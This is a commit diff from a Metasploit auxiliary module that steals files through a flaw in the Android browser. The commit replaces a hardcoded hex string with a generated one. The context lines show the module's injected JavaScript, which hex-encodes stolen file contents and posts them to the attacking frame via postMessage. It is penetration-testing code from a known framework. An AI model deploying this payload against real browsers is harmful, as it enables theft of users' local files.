Don't hardcode the hex.

2015-03-06 12:16:03 -06:00 · 2015-03-06 12:16:03 -06:00 · fefd4e271a
parent 3fb4fbe8e6
commit fefd4e271a
1 changed files with 1 additions and 1 deletions
--- a/modules/auxiliary/gather/android_browser_file_theft.rb
+++ b/modules/auxiliary/gather/android_browser_file_theft.rb
@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary
                    return (c.length < 2) ? 0+c : c;
                  }).join(new String);
                  /*ensures there are no 'not allowed' responses that appear to be valid data*/
-                  if (hex.length && hex.indexOf('3c68746d6c3e3c626f64793e6e6f7420616c6c6f7765643c2f626f64793e3c2f68746d6c3e') == '-1') {
+                  if (hex.length && hex.indexOf('#{Rex::Text.to_hex("<html><body>not allowed</body></html>","")}') == '-1') {
                    top.postMessage({data:hex,url:location.href}, '*');
                  }
                  parent.postMessage(1,'*');